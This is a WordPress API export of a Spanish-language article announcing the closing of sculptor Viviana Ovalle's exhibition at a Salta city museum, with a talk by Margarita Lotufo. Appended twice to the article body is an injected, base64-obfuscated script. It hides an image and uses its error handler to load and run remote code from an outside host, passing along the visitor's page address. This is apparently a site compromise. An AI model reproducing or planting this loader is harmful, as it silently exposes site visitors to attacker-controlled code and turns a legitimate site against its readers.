{"id":2151,"date":"2023-01-31T12:18:42","date_gmt":"2023-01-31T15:18:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2151"},"modified":"2025-08-14T00:24:21","modified_gmt":"2025-08-14T03:24:21","slug":"cierra-la-muestra-la-creacion-de-cada-dia-de-la-escultora-viviana-ovalle","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2151","title":{"rendered":"Cierra la muestra \u00abLa creaci\u00f3n de cada d\u00eda\u00bb de la escultora Viviana Ovalle"},"content":{"rendered":"\n<p class=\"has-text-color\" style=\"color:#a98113\"><strong><em>Ser\u00e1 este jueves 2 de febrero desde las 19.30 en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d. En la oportunidad, brindar\u00e1 una charla la artista y docente Margarita Lotufo.<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-1024x576.jpeg\" alt=\"\" class=\"wp-image-2155\" width=\"285\" height=\"160\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-1024x576.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-1068x601.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer-747x420.jpeg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/charla-escultura-flyer.jpeg 1280w\" sizes=\"(max-width: 285px) 100vw, 285px\" \/><\/figure><\/div>\n\n\n<p>La Secretar\u00eda de Cultura y Turismo de la Municipalidad invita al acto de cierre de la muestra \u00abLa creaci\u00f3n de cada d\u00eda \u00bb de la escultora Viviana Ovalle que se realizar\u00e1 este jueves 2 de febrero, a las 19.30, en el Museo de la Ciudad<\/p>\n\n\n\n<p>Dentro del ciclo \u00abMaese\u00bb dedicado a grandes artistas de la ciudad, esta segunda muestra tuvo como protagonista a la escultora Viviana Ovalle, quien adem\u00e1s de compartir su obra brind\u00f3 distintas charlas a vecinos y turistas sobre su obra y su trabajo.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"799\" data-id=\"2152\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-1024x799.jpg\" alt=\"\" class=\"wp-image-2152\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-1024x799.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-300x234.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-768x599.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-696x543.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-1068x833.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1-538x420.jpg 538w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-1.jpg 1110w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"680\" data-id=\"2153\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-1024x680.jpeg\" alt=\"\" class=\"wp-image-2153\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-1024x680.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-768x510.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-1536x1020.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-696x462.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-2.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" data-id=\"2154\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-1024x680.jpeg\" alt=\"\" class=\"wp-image-2154\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-1024x680.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-768x510.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-1536x1020.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-696x462.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/esculturas-muestra-ovalle-5.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Como actividad final se llevar\u00e1 a cabo la charla \u201cLa huella de la obra de Viviana Ovalle en la escultura salte\u00f1a\u201d a cargo de la cr\u00edtica de arte y docente Margarita Lotufo, el 2 de febrero a las 19:30 hs, donde se analizar\u00e1 la trayectoria de la artista y su importancia en la escena local, luego de la cual se realizar\u00e1 un acto y un brindis.<\/p>\n\n\n\n<p>Este ciclo, que busca homenajear a los maestros de nuestra ciudad, permite disfrutar de sus obras, material de archivo y audiovisuales. En el caso de la muestra de la profesora Viviana Ovalle, ya fue visitada por m\u00e1s de 3500 personas desde su inauguraci\u00f3n el pasado 17 de noviembre. Luego del cierre oficial permanecer\u00e1 abierta hasta el domingo 5 de febrero de 10 a 19.<\/p>\n\n\n\n<p>\u00abHaber trabajado con Viviana, abrir las puertas del Museo de la Ciudad para poder mostrar obras de su amplia trayectoria, haber podido recorrer con ella las salas en las visitas guiadas y culminar con esta charla es realmente un privilegio que pudimos disfrutar todos. Ovalle es una artista sumamente generosa, no s\u00f3lo en su trato, sino tambi\u00e9n en compartir sus conocimientos y su visi\u00f3n del arte\u00bb afirm\u00f3 la coordinadora de los museos municipales, Gracia Mart\u00ednez Arias.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 este jueves 2 de febrero desde las 19.30 en el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d. En la oportunidad, brindar\u00e1 una charla la artista y docente Margarita Lotufo. La Secretar\u00eda de Cultura y Turismo de la Municipalidad invita al acto de cierre de la muestra \u00abLa creaci\u00f3n de cada d\u00eda \u00bb de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2152,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-2151","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2151"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2151"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2151\/revisions"}],"predecessor-version":[{"id":7191,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2151\/revisions\/7191"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2152"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}